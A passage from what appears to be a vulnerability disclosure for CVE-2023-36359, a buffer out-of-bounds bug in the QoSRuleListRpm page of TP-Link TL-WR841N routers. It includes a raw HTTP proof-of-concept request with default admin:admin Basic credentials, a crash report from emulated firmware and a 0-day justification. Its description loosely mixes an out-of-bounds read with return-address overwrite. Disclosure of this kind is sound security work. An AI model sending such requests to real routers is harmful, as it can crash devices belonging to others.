Referer: http://192.168.0.1/WRKWVQRABLAJMDEB/userRpm/QoSRuleCfgRpm.htm?Add=Add&Page=1
Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D
Upgrade-Insecure-Requests: 1

The PoC of TP-Link TL-WR841N V8 is as follows:

GET /userRpm/QoSRuleListRpm.htm?enable=true&start\_ip\_addr=192.168.0.3&end\_ip\_addr=192.168.0.5&start\_port=23&end\_port=45&protocol&&reboot=0&min\_up\_band\_width=10&max\_up\_band\_width=100&min\_down\_band\_width=0&max\_down\_band\_width=0&Save=Save&curEditId=0&Page=1 HTTP/1.1
Host: 0.0.0.0:49169
User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive
Referer: http://0.0.0.0:49169/userRpm/QoSRuleCfgRpm.htm?Add=Add&Page=1
Cookie: Authorization=
Upgrade-Insecure-Requests: 1

**4 Vulnerability Principle**

When the Web management component receives a GET request, its /userRpm/QoSRuleListRpm component implements a security vulnerability in processing the protocol GET key parameter. The length of the parameter key of protocol can be any length and it is put into the stack without any boundary check, resulting in a read out-of-bounds. An attacker can exploit this vulnerability to overwrite the return address, which may lead to the disclosure of memory-sensitive information and denial of service.

The firmware is simulated by means of simulation, the simulation process and interface are as follows:

 After sending the PoC, a buffer read out-of-bounds memory error occurred, encountered an unexpected fatal signal 11 error and a BadVA error, causing the program to crash.

**5\. The basis for judging as a 0-day vulnerability**

Search the QoSRuleListRpm keyword in the NVD database, and no vulnerabilities are found (the same series of vulnerabilities can be found by directly searching the interface name to find related historical vulnerabilities).

Search the QoSRuleListRpm keyword in the CNVD database, and no vulnerabilities are found (the same series of vulnerabilities can be found by directly searching the interface name to find related historical vulnerabilities).

CVE-2023-36359: iotvul/tp-link/8/TP-Link TL-WR940N TL-WR841N TL-WR941ND wireless router userRpmQoSRuleListRpm buffer read out-of-bounds vulnerability.md at main · a101e-IoTvul/iotvul

Tag

#firefox